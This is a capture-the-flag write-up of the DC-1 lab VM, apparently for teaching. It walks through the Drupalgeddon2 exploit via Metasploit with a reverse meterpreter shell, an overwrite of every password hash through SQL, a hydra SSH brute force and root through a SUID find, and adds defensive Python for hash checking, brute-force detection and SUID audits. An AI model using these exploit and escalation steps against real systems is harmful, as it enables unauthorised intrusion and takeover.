Target machine page
Information gathering
Finding DC-1's IP address
DC-1's MAC address is 00:0C:29:60:07:4F. An nmap host-discovery scan of the subnet shows that this MAC maps to 192.168.175.148.
The target's web page
Scanning DC-1's open ports
┌──(kali㉿kali)-[~]
└─$ sudo nmap -Pn -A -p- -sS -sC -T4 192.168.175.148
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2023-03-30 10:57 EDT
Nmap scan report for 192.168.175.148
Host is up (0.0012s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE VERSION
22/tcp    open  ssh     OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
| ssh-hostkey:
|   1024 c4:d6:59:e6:77:4c:22:7a:96:16:60:67:8b:42:48:8f (DSA)
|   2048 11:82:fe:53:4e:dc:5b:32:7f:44:64:82:75:7d:d0:a0 (RSA)
|_  256 3d:aa:98:5c:87:af:ea:84:b8:23:68:8d:b9:05:5f:d8 (ECDSA)
80/tcp    open  http    Apache httpd 2.2.22 ((Debian))
|_http-generator: Drupal 7 (http://drupal.org)
| http-robots.txt: 36 disallowed entries (15 shown)
| /includes/ /misc/ /modules/ /profiles/ /scripts/
| /themes/ /CHANGELOG.txt /cron.php /INSTALL.mysql.txt
| /INSTALL.pgsql.txt /INSTALL.sqlite.txt /install.php /INSTALL.txt
|_/LICENSE.txt /MAINTAINERS.txt
|_http-server-header: Apache/2.2.22 (Debian)
|_http-title: Welcome to Drupal Site | Drupal Site
111/tcp   open  rpcbind 2-4 (RPC #100000)
| rpcinfo:
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100024  1          41137/udp   status
|   100024  1          44638/tcp   status
|   100024  1          46632/udp6  status
|_  100024  1          53040/tcp6  status
44638/tcp open  status  1 (RPC #100024)
MAC Address: 00:0C:29:60:07:4F (VMware)
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.2 - 3.16
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   1.16 ms 192.168.175.148

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.61 seconds
Port   State  Service  Version
22     open   ssh      OpenSSH 6.0p1 Debian 4+deb7u7 (protocol 2.0)
80     open   http     Apache httpd 2.2.22 ((Debian))
111    open   rpcbind  2-4 (RPC #100000)
44638  open   status   1 (RPC #100024)
Web application fingerprint
OS            Linux 3.x
Server        Apache/2.2.22 (Debian)
X-Powered-By  PHP/5.4.45-0+deb7u14
The site is built on Drupal 7, so the Drupal-specific scanner droopescan is run against it.
droopescan scan
┌──(kali㉿kali)-[~/tools/droopescan]
└─$ ./droopescan scan drupal -u http://192.168.175.148
[+] Plugins found:
    ctools http://192.168.175.148/sites/all/modules/ctools/
        http://192.168.175.148/sites/all/modules/ctools/LICENSE.txt
        http://192.168.175.148/sites/all/modules/ctools/API.txt
    views http://192.168.175.148/sites/all/modules/views/
        http://192.168.175.148/sites/all/modules/views/README.txt
        http://192.168.175.148/sites/all/modules/views/LICENSE.txt
    profile http://192.168.175.148/modules/profile/
    php http://192.168.175.148/modules/php/
    image http://192.168.175.148/modules/image/

[+] Themes found:
    seven http://192.168.175.148/themes/seven/
    garland http://192.168.175.148/themes/garland/

[+] Possible version(s):
    7.22
    7.23
    7.24
    7.25
    7.26

[+] Possible interesting urls found:
    Default admin - http://192.168.175.148/user/login

[+] Scan finished (0:08:14.470190 elapsed)
Vulnerability scan report
The scan reports the following findings, including CVE-2014-3704 and CVE-2018-7600:
No.  Vuln
1    Drupal Core SQL Injection Vulnerability (CVE-2014-3704)
2    Drupal Core Critical Remote Code Execution Vulnerability (SA-CORE-2018-002) (Active Check) (CVE-2018-7600)
3    Sensitive File Disclosure (HTTP)
4    Cleartext Transmission of Sensitive Information via HTTP
5    SSH Weak Encryption Algorithms Supported
Exploitation
CVE-2018-7600
The remote code execution vulnerability can be used to get a shell by hand, or Metasploit can do it directly; MSF is used here.
Run
search drupal
to list the related exploit modules. The module for the 2018 CVE is used to get the shell; load it with use 1.
msf6 > use 1
[*] No payload configured, defaulting to php/meterpreter/reverse_tcp
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > show options

Module options (exploit/unix/webapp/drupal_drupalgeddon2):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   DUMP_OUTPUT  false            no        Dump payload command output
   PHP_FUNC     passthru         yes       PHP function to execute
   Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT        80               yes       The target port (TCP)
   SSL          false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI    /                yes       Path to Drupal install
   VHOST                         no        HTTP server virtual host

Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.175.144  yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic (PHP In-Memory)

msf6 exploit(unix/webapp/drupal_drupalgeddon2) > set rhosts 192.168.175.148
rhosts => 192.168.175.148
msf6 exploit(unix/webapp/drupal_drupalgeddon2) > show options

Module options (exploit/unix/webapp/drupal_drupalgeddon2):

   Name         Current Setting  Required  Description
   ----         ---------------  --------  -----------
   DUMP_OUTPUT  false            no        Dump payload command output
   PHP_FUNC     passthru         yes       PHP function to execute
   Proxies                       no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS       192.168.175.148  yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT        80               yes       The target port (TCP)
   SSL          false            no        Negotiate SSL/TLS for outgoing connections
   TARGETURI    /                yes       Path to Drupal install
   VHOST                         no        HTTP server virtual host

Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  192.168.175.144  yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Automatic (PHP In-Memory)

msf6 exploit(unix/webapp/drupal_drupalgeddon2) > exploit

[*] Started reverse TCP handler on 192.168.175.144:4444
[*] Executing automatic check (disable AutoCheck to override)
[!] The service is running, but could not be validated.
[*] Sending stage (39282 bytes) to 192.168.175.148
[*] Meterpreter session 1 opened (192.168.175.144:4444 -> 192.168.175.148:33015) at 2023-03-30 12:09:16 -0400
Getshell
Spawn an interactive TTY shell, which is more stable to work in:
python -c 'import pty; pty.spawn("/bin/bash")'
Next, look around for files; there is a flag1.txt.
Contents of flag1.txt:
Every good CMS needs a config file - and you are no exception.
Following the hint, the Drupal configuration file is the target; a quick search shows it is settings.php.
Reading settings.php reveals flag2 together with the database credentials: user dbuser, password R0ck3t.
www-data@DC-1:/var/www/sites/default$ cat settings.php
<?php
/**
 *
 * flag2
 * Brute force and dictionary attacks aren't the
 * only ways to gain access (and you WILL need access).
 * What can you do with these credentials?
 *
 */
$databases = array (
  'default' =>
  array (
    'default' =>
    array (
      'database' => 'drupaldb',
      'username' => 'dbuser',
      'password' => 'R0ck3t',
      'host' => 'localhost',
      'port' => '',
      'driver' => 'mysql',
      'prefix' => '',
    ),
  ),
);
Next, connect to the database:
mysql -udbuser -pR0ck3t
There is a database named drupaldb.
It contains a users table, which presumably holds the account names and passwords.
Sure enough, there is an account named admin, but its password is stored as a hash and cannot be used directly. The password can, however, be replaced with an UPDATE against the database.
Drupal generates password hashes with its bundled password-hash.sh script by default; see the referenced article.
update users set pass="$S$DtiZnUFHDz.DS54lIrOfYnyKmuN1keAwlBplfIILOa0frxvNdx8H";
# sets the pass column of every row in users to $S$DtiZnUFHDz.DS54lIrOfYnyKmuN1keAwlBplfIILOa0frxvNdx8H, the hash of the password admin
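The value written into pass above is not an encrypted password but a Drupal 7 salted hash in the $S$ format, which is why it can only be replaced, never read back. The following is an added example, not code from the write-up and not Drupal's own code: a Python reimplementation of the hashing in Drupal 7's includes/password.inc that shows what password-hash.sh produces and how a login re-hashes the candidate password with the stored salt. The function names drupal7_hash, parse_setting and verify are my own; the salt tiZnUFHD and the round count are taken from the hash on this page.

```python
import hashlib
import hmac

# Alphabet and length limit from Drupal 7's includes/password.inc
ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
HASH_LENGTH = 55  # DRUPAL_HASH_LENGTH: the stored string is truncated to 55 chars


def _b64(data: bytes) -> str:
    """Drupal's phpass-style base64: little-endian 3-byte groups, 2/3/4 chars each, no padding."""
    out = []
    for i in range(0, len(data), 3):
        chunk = data[i:i + 3]
        value = int.from_bytes(chunk, "little")
        for k in range(len(chunk) + 1):
            out.append(ITOA64[(value >> (6 * k)) & 0x3F])
    return "".join(out)


def drupal7_hash(password: str, salt: str, count_log2: int = 15) -> str:
    """_password_crypt('sha512', ...): '$S$' + count char + 8-char salt + encoded digest."""
    setting = "$S$" + ITOA64[count_log2] + salt  # 12-char setting; 'D' means 2**15 rounds
    pw = password.encode()
    digest = hashlib.sha512(salt.encode() + pw).digest()
    for _ in range(1 << count_log2):
        digest = hashlib.sha512(digest + pw).digest()
    return (setting + _b64(digest))[:HASH_LENGTH]


def parse_setting(stored: str) -> tuple:
    """Split a stored value into (count_log2, salt); anything that is not $S$ format is rejected."""
    if len(stored) < 12 or stored[:3] != "$S$":
        raise ValueError("not a Drupal 7 $S$ hash")
    return ITOA64.index(stored[3]), stored[4:12]


def verify(stored: str, password: str) -> bool:
    """What Drupal does at login: re-hash the candidate with the stored salt and compare."""
    count_log2, salt = parse_setting(stored)
    if not 7 <= count_log2 <= 30:  # DRUPAL_MIN_HASH_COUNT .. DRUPAL_MAX_HASH_COUNT
        return False
    return hmac.compare_digest(drupal7_hash(password, salt, count_log2), stored)


if __name__ == "__main__":
    page_hash = "$S$DtiZnUFHDz.DS54lIrOfYnyKmuN1keAwlBplfIILOa0frxvNdx8H"  # value from the write-up
    print("count_log2 and salt:", parse_setting(page_hash))
    print("hash matches 'admin':", verify(page_hash, "admin"))
```

password-hash.sh differs only in that it draws a fresh 8-character salt from 6 random bytes for each hash, which is why two hashes of the same password never match.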
Now we can log in.
Exploring the site's features after logging in reveals flag3:
Special PERMS will help FIND the passwd - but you'll need to -exec that command to work out how to get what's in the shadow.
Checking the home directory turns up flag4:
Can you use this same method to find or access the flag in root? Probably. But perhaps it's not that easy. Or maybe it is?
flag4 gives no obvious lead, but flag3 mentioned "special PERMS" and "shadow". /etc/shadow is not readable with the current permissions, but /etc/passwd is, and it lists a user named flag4. Since the information-gathering phase showed port 22 open, the next step is to find flag4's password and connect over SSH.
SSH password brute force
hydra is used for the brute force.
The password wordlist and the hydra command used here:
hydra ssh://192.168.175.148 -l flag4 -P /usr/share/john/password.lst -vV -f -t 64
# -vV  show every attempt
# -f   stop as soon as a login succeeds
# -t   number of parallel connections (speed)
hydra finds flag4's password: orange. Logging in over SSH with it succeeds. Checking /etc/shadow to see whether flag4 has elevated privileges shows that it does not, so privilege escalation is next.
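From the defender's side, a dictionary attack like the hydra run above is loud in the target's auth log: many "Failed password" lines from one address within seconds, then an "Accepted password" for the same user. The following is an added example, not from the write-up: a Python detector run over a constructed auth.log excerpt. detect_bruteforce, LINE_RE and the sample lines are my own, and the sliding-window threshold (5 failures in 60 s) is an assumption to tune per environment.

```python
import re
from collections import defaultdict
from datetime import datetime

# Constructed /var/log/auth.log excerpt (not captured from the DC-1 box): one source
# fails five times in a few seconds and then succeeds, the signature of a dictionary attack.
SAMPLE_AUTH_LOG = """\
Mar 30 12:31:01 DC-1 sshd[2201]: Failed password for flag4 from 192.168.175.144 port 50212 ssh2
Mar 30 12:31:01 DC-1 sshd[2203]: Failed password for flag4 from 192.168.175.144 port 50214 ssh2
Mar 30 12:31:02 DC-1 sshd[2205]: Failed password for flag4 from 192.168.175.144 port 50216 ssh2
Mar 30 12:31:02 DC-1 sshd[2207]: Failed password for flag4 from 192.168.175.144 port 50218 ssh2
Mar 30 12:31:03 DC-1 sshd[2209]: Failed password for flag4 from 192.168.175.144 port 50220 ssh2
Mar 30 12:31:03 DC-1 sshd[2211]: Accepted password for flag4 from 192.168.175.144 port 50222 ssh2
Mar 30 12:40:10 DC-1 sshd[2290]: Failed password for root from 10.0.0.7 port 41000 ssh2
Mar 30 12:45:10 DC-1 sshd[2301]: Accepted publickey for admin from 10.0.0.9 port 41002 ssh2
"""

LINE_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(?P<result>Failed|Accepted) (?:password|publickey) for (?:invalid user )?"
    r"(?P<user>\S+) from (?P<ip>\S+) port \d+"
)


def detect_bruteforce(log_text: str, threshold: int = 5, window_s: int = 60, year: int = 2023) -> dict:
    """Return {(ip, user): {"failures": n, "success_after": bool}} for every source that
    produced `threshold` or more failed logins inside a sliding `window_s`-second window."""
    recent = defaultdict(list)  # (ip, user) -> failure timestamps still inside the window
    alerts = {}
    for line in log_text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not an sshd auth line (syslog has no year, so one is supplied)
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        key = (m["ip"], m["user"])
        if m["result"] == "Failed":
            window = [t for t in recent[key] if (ts - t).total_seconds() <= window_s] + [ts]
            recent[key] = window
            if len(window) >= threshold:
                alerts.setdefault(key, {"failures": 0, "success_after": False})["failures"] = len(window)
        elif key in alerts:  # a success right after a burst of failures: treat the account as compromised
            alerts[key]["success_after"] = True
    return alerts


if __name__ == "__main__":
    for (ip, user), info in detect_bruteforce(SAMPLE_AUTH_LOG).items():
        print(f"ALERT {ip} -> {user}: {info['failures']} failures, login succeeded: {info['success_after']}")
```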
Privilege escalation
Getting root
Escalation approaches:
Exploit a kernel vulnerability
Leaked sudo privileges
Abuse a SUID binary
flag3 hinted at PERMS, so SUID escalation is the way to go here.
What is SUID privilege escalation?
Take find as the example. If the find binary carries the SUID bit, running it gives the process the file owner's (root's) effective privileges. Trust is transitive: if A trusts B and B trusts C, then A indirectly trusts C. In the same way, while a SUID command invokes another command B, it holds root privileges, so B runs with root privileges as well.
Find commands with the SUID bit set:
find / -perm -4000 2>/dev/null
find itself has the SUID bit, so it is used for the escalation.
First create a directory, then escalate through find:
mkdir tacoking
find tacoking -exec /bin/sh \;
# -exec runs an external command for each match: find, holding root privileges through its SUID bit, spawns /bin/sh and hands those privileges on. Because tacoking is an empty directory, find matches it exactly once and runs the command once.
After escalating, change to the root directory; it contains thefinalflag.txt, which holds the final flag.
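The escalation above only works because /usr/bin/find carries a SUID bit it has no business having, which is exactly what a periodic SUID audit catches. The following is an added example, not from the write-up: a Python audit that walks a filesystem, lists SUID regular files and reports anything missing from a baseline. find_suid, unexpected_suid and build_sample_tree are my own names; the baseline set and the staged directory tree the demo runs against are constructed, and a real deployment would take the baseline from a clean build.

```python
import os
import stat
import tempfile

# Constructed baseline: the SUID files expected on this host. In practice snapshot it from a
# clean build with `find / -perm -4000` and keep it under configuration management.
BASELINE_SUID = {"/bin/su", "/bin/mount", "/bin/umount", "/usr/bin/passwd", "/usr/bin/sudo"}


def find_suid(root: str = "/") -> set:
    """Return every regular file under root with the set-user-ID bit, as a path relative to root
    (so a staged tree under /tmp and a live system yield comparable names)."""
    found = set()
    for dirpath, dirnames, filenames in os.walk(root, onerror=lambda err: None):
        if os.path.abspath(dirpath) == os.path.abspath(root):
            dirnames[:] = [d for d in dirnames if d not in ("proc", "sys", "dev")]  # pseudo-fs, skip
        for name in filenames:
            full = os.path.join(dirpath, name)
            try:
                st = os.lstat(full)  # lstat: never follow symlinks
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.add("/" + os.path.relpath(full, root))
    return found


def unexpected_suid(root: str = "/", baseline: set = BASELINE_SUID) -> set:
    """SUID files that are not in the baseline: on DC-1 this is where /usr/bin/find shows up."""
    return find_suid(root) - set(baseline)


def build_sample_tree() -> str:
    """Construct a throwaway tree that mimics DC-1: su is legitimately SUID, find has been
    given the SUID bit, ls has not. Returns the tree's root path."""
    root = tempfile.mkdtemp(prefix="suid-audit-")
    for rel, mode in (("bin/su", 0o4755), ("usr/bin/find", 0o4755), ("usr/bin/ls", 0o755)):
        path = os.path.join(root, rel)
        os.makedirs(os.path.dirname(path), exist_ok=True)
        open(path, "w").close()
        os.chmod(path, mode)  # owner may set SUID on their own file without root
    return root


if __name__ == "__main__":
    for path in sorted(unexpected_suid(build_sample_tree())):
        print("unexpected SUID binary:", path)
```

Run it with the default root of "/" on a live host to compare against the real baseline; a newly appearing entry such as /usr/bin/find is the finding to act on.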
Tips
Because Metasploit was used to get the shell directly, the details of CVE-2014-3704 and CVE-2018-7600 are not covered here. Those interested can read these two articles.